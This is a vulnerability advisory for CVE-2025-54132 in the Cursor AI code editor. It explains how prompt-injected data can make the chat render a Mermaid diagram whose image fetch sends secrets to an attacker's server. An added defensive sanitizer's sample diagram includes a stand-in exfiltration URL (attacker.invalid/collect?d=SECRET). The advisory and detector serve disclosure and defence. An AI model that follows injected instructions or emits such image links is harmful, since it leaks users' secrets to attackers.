CVE-2025-54132

Published Aug 1, 2025

Last updated 17 days ago

Overview

AI description

Automated description summarized from trusted sources.

CVE-2025-54132 affects Cursor, a code editor designed for AI programming. Specifically, versions prior to 1.3 are vulnerable. The vulnerability lies in the Mermaid diagram tool, which allows embedding images that Cursor renders in the chat box. An attacker can exploit this by injecting malicious data (e.g., via web sources, image uploads, or source code) to perform a prompt injection. This allows the attacker to exfiltrate sensitive information to a third-party server they control through an image fetch. A malicious AI model could also trigger this exploit. Version 1.3 of Cursor resolves this vulnerability.

Description
Cursor is a code editor built for programming with AI. In versions below 1.3, Mermaid (which is used to render diagrams) allows embedding images, which Cursor then renders in the chat box. After a successful prompt injection, an attacker can use this to exfiltrate sensitive information to a third-party, attacker-controlled server through an image fetch. A malicious model (or a hallucination/backdoor) might also trigger this exploit at will. This issue requires prompt injection from malicious data (web content, image upload, source code) in order to exploit; in that case, it can send sensitive information to an attacker-controlled external server. This is fixed in version 1.3.
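One defensive check for the mechanism described above, as an added example that is not Cursor's own fix: before a chat webview renders a Mermaid diagram, neutralize any image reference that would fetch from a host outside an allowlist, and report what was blocked so it can be logged. The three image syntaxes matched, the allowlist and the sample diagram are assumptions constructed for the example.

```javascript
// Added example, not Cursor's own fix: strip remote image references from a
// Mermaid diagram before the chat webview renders it, so that a diagram
// produced under prompt injection cannot trigger an image fetch to an
// attacker-chosen host. The three image syntaxes matched below are an
// assumption about Mermaid input, not its full grammar.
const IMAGE_PATTERNS = [
  /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi, // HTML <img src=...>
  /!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)/g,           // markdown ![alt](url)
  /\bimg\s*:\s*["']([^"']+)["']/g,               // img: "url" node attribute
];
// Hosts the renderer may load images from (constructed allowlist).
const ALLOWED_IMAGE_HOSTS = new Set(["localhost"]);
// Base used only to resolve relative and protocol-relative references.
const LOCAL_BASE = "https://local.invalid";

// True when loading `url` would contact a host outside the allowlist.
function isRemoteImage(url) {
  let parsed;
  try {
    parsed = new URL(url, LOCAL_BASE);
  } catch {
    return true; // unparseable: fail closed and block it
  }
  if (parsed.protocol === "data:") return false;         // inline, no fetch
  if (parsed.hostname === "local.invalid") return false; // relative path
  return !ALLOWED_IMAGE_HOSTS.has(parsed.hostname);
}

// Neutralizes remote image references and returns the URLs it blocked, so
// the caller can log a detection event or warn the user.
function sanitizeMermaid(diagram) {
  const blocked = [];
  let out = diagram;
  for (const pattern of IMAGE_PATTERNS) {
    out = out.replace(pattern, (match, url) => {
      if (!isRemoteImage(url)) return match;
      blocked.push(url);
      return match.replace(url, "about:blank");
    });
  }
  return { diagram: out, blocked };
}

// Constructed sample of what a prompt-injected model might emit: one node
// carries an image whose URL smuggles a secret in its query string.
const SAMPLE_DIAGRAM = [
  "graph TD",
  "  A[\"<img src='https://attacker.invalid/collect?d=SECRET'>\"] --> B",
  "  B --> C[\"![logo](./logo.png)\"]",
].join("\n");
```

The non-empty `blocked` list is the detection signal: a diagram that tries to reach a non-allowlisted host is exactly the behaviour this advisory describes, whether it came from injected data or from the model itself.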
Source: security-advisories@github.com
NVD status: Awaiting Analysis

Risk scores

CVSS 3.1

Type: Secondary
Base score: 4.4
Impact score: 3.6
Exploitability score: 0.7
Vector string: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N
Severity: MEDIUM

Weaknesses

CWE-918 (Server-Side Request Forgery), assigned by security-advisories@github.com

